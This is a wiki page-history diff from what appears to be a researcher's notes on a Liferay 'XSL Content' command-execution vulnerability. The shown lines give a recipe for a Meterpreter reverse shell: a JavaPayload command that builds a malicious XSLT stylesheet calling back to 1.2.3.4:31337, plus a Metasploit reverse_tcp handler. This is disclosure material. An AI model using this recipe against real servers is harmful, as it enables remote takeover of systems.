Changes for page Application_Liferay

Last modified by Nicolas Gregoire on 2012/04/19 14:05
From version Icon 24.1 Icon
edited by Nicolas Gregoire
on 2012/04/19 14:05
Change comment: There is no comment for this version
To version Icon 25.1
edited by Nicolas Gregoire
on 2012/04/19 14:05
Change comment: There is no comment for this version

Summary

Details

Icon Page properties
Content
... ... @@ -18,11 +18,10 @@
18 18  
19 19  As described in [[Feature #6594: Liferay XSL Command Execution>>http://dev.metasploit.com/redmine/issues/6594||rel="__blank"]], here's a way to gain a Meterpreter shell with this vulnerability :
20 20  
21 -- stand-alone JavaPayload to generate the XSLT stylesheet (java jar JavaPayload.jar Builder Template XalanJ.xsl output.xsl ReverseTCP 1.2.3.4 31337 -- JSh)
21 +- stand-alone JavaPayload to generate the XSLT stylesheet (java jar JavaPayload.jar Builder Template XalanJ.xsl output.xsl ReverseTCP 1.2.3.4 31337 - - JSh)
22 22  - Metasploit to handle the Meterpreter connection (PAYLOAD=java/meterpreter/reverse_tcp)
23 23  - Manual interaction to trigger the vulnerability (browser)
24 24  
25 -
26 26  = Additional vulnerabilities =
27 27  
28 28  Two others vulnerabilities were identified in the "XSL Content" portlet :